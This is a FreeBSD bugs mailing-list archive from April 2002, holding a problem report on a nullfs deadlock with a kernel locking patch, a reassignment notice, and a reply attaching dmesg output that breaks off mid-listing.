"unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 21:40:29 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D1CC837B41F for ; Fri, 19 Apr 2002 21:40:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3K4e1d46734; Fri, 19 Apr 2002 21:40:01 -0700 (PDT) (envelope-from gnats) Received: from green.shallow.net (c16486.smelb1.vic.optusnet.com.au [210.49.224.105]) by hub.freebsd.org (Postfix) with ESMTP id 0308E37B41E for ; Fri, 19 Apr 2002 21:30:34 -0700 (PDT) Received: by green.shallow.net (Postfix, from userid 1001) id C873A3E2A; Sat, 20 Apr 2002 14:30:30 +1000 (EST) Message-Id: <20020420043030.C873A3E2A@green.shallow.net> Date: Sat, 20 Apr 2002 14:30:30 +1000 (EST) From: Joshua Goodall Reply-To: Joshua Goodall To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/37270: nullfs broken by locking changes in -current Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37270 >Category: kern >Synopsis: nullfs broken by locking changes in -current >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Apr 19 21:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Joshua Goodall >Release: FreeBSD 5.0-CURRENT i386 >Organization: >Environment: System: FreeBSD toxic.myrrh.net 5.0-CURRENT FreeBSD 5.0-CURRENT #1: Sat Apr 20 03:25:54 EST 2002 joshua@green.shallow.net:/usr/obj/usr/current/sys/TOXIC i386 >Description: The change to default to shared looks during a namei lookup causes a deadlock in nullfs, which doesn't propogate the flags to functions in null_subr.c Thus nullfs tries to get an exclusive recursive lock on a v_vnlock that is already locked shared during the same traversal, and hangs. >How-To-Repeat: # mount -t nullfs /var /null # cd /null/tmp (never returns, deadlocked in wchan "inode") reproduced on a) a sony vaio and b) vmware >Fix: This was fun[tm] to debug. The ugly workaround is "options LOOKUP_EXCLUSIVE". A suggested fix is below. It passes the flags down during appropriate operations, defaulting to exclusive (flags = 0). This fixes the problem on both crashboxes and survives a basic fs stressing (multiple parallel finds, cp -R's and postmarks to/from a given nullmount for an hour). A similar fix works for my WIP morphfs layer. Joshua --- nullfs-locking.diff begins here --- Index: null.h =================================================================== RCS file: /cvs/src/sys/fs/nullfs/null.h,v retrieving revision 1.15 diff -u -r1.15 null.h --- null.h 5 Sep 2000 09:02:07 -0000 1.15 +++ null.h 19 Apr 2002 16:05:12 -0000 @@ -63,7 +63,8 @@ int nullfs_init(struct vfsconf *vfsp); int nullfs_uninit(struct vfsconf *vfsp); -int null_node_create(struct mount *mp, struct vnode *target, struct vnode **vpp); +int null_node_create(struct mount *mp, struct vnode *target, + struct vnode **vpp, int flags); int null_bypass(struct vop_generic_args *ap); #ifdef DIAGNOSTIC Index: null_subr.c =================================================================== RCS file: /cvs/src/sys/fs/nullfs/null_subr.c,v retrieving revision 1.32 diff -u -r1.32 null_subr.c --- null_subr.c 12 Sep 2001 08:37:19 -0000 1.32 +++ null_subr.c 19 Apr 2002 17:50:08 -0000 @@ -46,6 +46,7 @@ #include #include #include +#include #include @@ -71,9 +72,9 @@ MALLOC_DEFINE(M_NULLFSNODE, "NULLFS node", "NULLFS vnode private part"); static int null_node_alloc(struct mount *mp, struct vnode *lowervp, - struct vnode **vpp); + struct vnode **vpp, int flags); static struct vnode * - null_node_find(struct mount *mp, struct vnode *lowervp); + null_node_find(struct mount *mp, struct vnode *lowervp, int flags); /* * Initialise cache headers @@ -106,14 +107,16 @@ * Lower vnode should be locked on entry and will be left locked on exit. */ static struct vnode * -null_node_find(mp, lowervp) +null_node_find(mp, lowervp, flags) struct mount *mp; struct vnode *lowervp; + int flags; { struct thread *td = curthread; /* XXX */ struct null_node_hashhead *hd; struct null_node *a; struct vnode *vp; + int error; /* * Find hash base, and then search the (two-way) linked @@ -133,7 +136,15 @@ * stuff, but we don't want to lock * the lower node. */ - if (vget(vp, LK_EXCLUSIVE | LK_CANRECURSE, td)) { +#ifndef LOOKUP_EXCLUSIVE + if ((flags & ISLASTCN) && (flags & LOCKSHARED)) + error = vget(vp, LK_SHARED, td); + else + error = vget(vp, LK_EXCLUSIVE | LK_CANRECURSE, td); +#else + error = vget(vp, LK_EXCLUSIVE | LK_CANRECURSE, td); +#endif + if (error) { printf ("null_node_find: vget failed.\n"); goto loop; }; @@ -157,10 +168,11 @@ * Maintain a reference to (lowervp). */ static int -null_node_alloc(mp, lowervp, vpp) +null_node_alloc(mp, lowervp, vpp, flags) struct mount *mp; struct vnode *lowervp; struct vnode **vpp; + int flags; { struct thread *td = curthread; /* XXX */ struct null_node_hashhead *hd; @@ -192,7 +204,7 @@ * check to see if someone else has beaten us to it. * (We could have slept in MALLOC.) */ - othervp = null_node_find(mp, lowervp); + othervp = null_node_find(mp, lowervp, flags); if (othervp) { vp->v_data = NULL; FREE(xp, M_NULLFSNODE); @@ -213,7 +225,14 @@ lockmgr(&null_hashlock, LK_EXCLUSIVE, NULL, td); vp->v_vnlock = lowervp->v_vnlock; +#ifndef LOOKUP_EXCLUSIVE + if ((flags & ISLASTCN) && (flags & LOCKSHARED)) + error = VOP_LOCK(vp, LK_SHARED | LK_THISLAYER, td); + else + error = VOP_LOCK(vp, LK_EXCLUSIVE | LK_THISLAYER, td); +#else error = VOP_LOCK(vp, LK_EXCLUSIVE | LK_THISLAYER, td); +#endif if (error) panic("null_node_alloc: can't lock new vnode\n"); @@ -231,14 +250,15 @@ * vnode which contains a reference to the lower vnode. */ int -null_node_create(mp, lowervp, newvpp) +null_node_create(mp, lowervp, newvpp, flags) struct mount *mp; struct vnode *lowervp; struct vnode **newvpp; + int flags; { struct vnode *aliasvp; - aliasvp = null_node_find(mp, lowervp); + aliasvp = null_node_find(mp, lowervp, flags); if (aliasvp) { /* * null_node_find has taken another reference @@ -259,7 +279,7 @@ /* * Make new vnode reference the null_node. */ - error = null_node_alloc(mp, lowervp, &aliasvp); + error = null_node_alloc(mp, lowervp, &aliasvp, flags); if (error) return error; Index: null_vfsops.c =================================================================== RCS file: /cvs/src/sys/fs/nullfs/null_vfsops.c,v retrieving revision 1.51 diff -u -r1.51 null_vfsops.c --- null_vfsops.c 17 Mar 2002 01:25:41 -0000 1.51 +++ null_vfsops.c 19 Apr 2002 15:59:32 -0000 @@ -171,7 +171,7 @@ * Save reference. Each mount also holds * a reference on the root vnode. */ - error = null_node_create(mp, lowerrootvp, &vp); + error = null_node_create(mp, lowerrootvp, &vp, 0); /* * Unlock the node (either the lower or the alias) */ @@ -356,7 +356,7 @@ if (error) return (error); - return (null_node_create(mp, *vpp, vpp)); + return (null_node_create(mp, *vpp, vpp, flags)); } static int @@ -370,7 +370,7 @@ if (error) return (error); - return (null_node_create(mp, *vpp, vpp)); + return (null_node_create(mp, *vpp, vpp, 0)); } static int Index: null_vnops.c =================================================================== RCS file: /cvs/src/sys/fs/nullfs/null_vnops.c,v retrieving revision 1.50 diff -u -r1.50 null_vnops.c --- null_vnops.c 12 Sep 2001 08:37:19 -0000 1.50 +++ null_vnops.c 19 Apr 2002 17:00:42 -0000 @@ -346,7 +346,7 @@ vppp = VOPARG_OFFSETTO(struct vnode***, descp->vdesc_vpp_offset,ap); if (*vppp) - error = null_node_create(old_vps[0]->v_mount, **vppp, *vppp); + error = null_node_create(old_vps[0]->v_mount, **vppp, *vppp, 0); } out: @@ -400,7 +400,7 @@ VREF(dvp); vrele(lvp); } else { - error = null_node_create(dvp->v_mount, lvp, &vp); + error = null_node_create(dvp->v_mount, lvp, &vp, flags); if (error == 0) *ap->a_vpp = vp; } --- nullfs-locking.diff ends here --- >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Apr 19 21:53:47 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 21A1937B417; Fri, 19 Apr 2002 21:53:45 -0700 (PDT) Received: (from alfred@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3K4rjZ48112; Fri, 19 Apr 2002 21:53:45 -0700 (PDT) (envelope-from alfred) Date: Fri, 19 Apr 2002 21:53:45 -0700 (PDT) From: Message-Id: <200204200453.g3K4rjZ48112@freefall.freebsd.org> To: alfred@FreeBSD.org, freebsd-bugs@FreeBSD.org, jeffr@FreeBSD.org Subject: Re: kern/37270: nullfs broken by locking changes in -current Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: nullfs broken by locking changes in -current Responsible-Changed-From-To: freebsd-bugs->jeffr Responsible-Changed-By: alfred Responsible-Changed-When: Fri Apr 19 21:53:32 PDT 2002 Responsible-Changed-Why: http://www.freebsd.org/cgi/query-pr.cgi?pr=37270 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Apr 20 2:12:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8DDAC37B42C for ; Sat, 20 Apr 2002 02:10:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3K9A3T02481; Sat, 20 Apr 2002 02:10:03 -0700 (PDT) (envelope-from gnats) Date: Sat, 20 Apr 2002 02:10:03 -0700 (PDT) Message-Id: <200204200910.g3K9A3T02481@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Pizik Ilya Subject: Re: kern/37257: SMP 4.5 freezes Reply-To: Pizik Ilya Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/37257; it has been noted by GNATS. From: Pizik Ilya To: freebsd-gnats-submit@FreeBSD.org Cc: Subject: Re: kern/37257: SMP 4.5 freezes Date: Sat, 20 Apr 2002 13:06:35 +0400 This is a multi-part message in MIME format. --------------050207040302010603020302 Content-Type: text/plain; charset=KOI8-R; format=flowed Content-Transfer-Encoding: 7bit Information that you have requested is attached -- With respect, Pizik Ilya. --------------050207040302010603020302 Content-Type: text/plain; name="dmesg" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="dmesg" Copyright (c) 1992-2002 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.5-STABLE #1: Thu Apr 18 20:42:54 MSD 2002 root@scar.jinr.ru:/usr/obj/usr/src/sys/SCAR Timecounter "i8254" frequency 1193182 Hz CPU: Pentium III/Pentium III Xeon/Celeron (1004.52-MHz 686-class CPU) Origin = "GenuineIntel" Id = 0x68a Stepping = 10 Features=0x383fbff real memory = 1073741824 (1048576K bytes) avail memory = 1041670144 (1017256K bytes) Programming 24 pins in IOAPIC #0 IOAPIC #0 intpin 2 -> irq 0 FreeBSD/SMP: Multiprocessor motherboard cpu0 (BSP): apic id: 3, version: 0x00040011, at 0xfee00000 cpu1 (AP): apic id: 0, version: 0x00040011, at 0xfee00000 io0 (APIC): apic id: 2, version: 0x00178011, at 0xfec00000 Preloaded elf kernel "kernel" at 0xc033b000. VESA: v2.0, 32768k memory, flags:0x1, mode table:0xc02d3f02 (1000022) VESA: ATI RAGE128 Pentium Pro MTRR support enabled Using $PIR table, 7 entries at 0xc00f12d0 apm0: on motherboard apm: found APM BIOS v1.2, connected at v1.2 npx0: on motherboard npx0: INT 16 interface pcib0: on motherboard IOAPIC #0 intpin 18 -> irq 2 IOAPIC #0 intpin 19 -> irq 5 IOAPIC #0 intpin 17 -> irq 9 pci0: on pcib0 agp0: mem 0xfc000000-0xfdffffff at device 0.0 on pci0 pcib2: at device 1.0 on pci0 IOAPIC #0 intpin 16 -> irq 10 pci1: on pcib2 pci1: at 0.0 irq 10 isab0: at device 4.0 on pci0 isa0: on isab0 atapci0: port 0xb800-0xb80f at device 4.1 on pci0 ata0: at 0x1f0 irq 14 on atapci0 ata1: at 0x170 irq 15 on atapci0 pci0: at 4.2 irq 2 pci0: at 4.3 irq 2 fxp0: port 0xa800-0xa81f mem 0xf4800000-0xf48fffff,0xf7000000-0xf7000fff irq 5 at device 9.0 on pci0 fxp0: Ethernet address 00:08:c7:d2:21:11 inphy0: on miibus0 inphy0: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto fxp1: port 0xa400-0xa41f mem 0xf4000000-0xf40fffff,0xf6000000-0xf6000fff irq 9 at device 11.0 on pci0 fxp1: Ethernet address 00:04:ac:d8:85:fe inphy1: on miibus1 inphy1: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto pcib1: on motherboard pci2: on pcib1 orm0: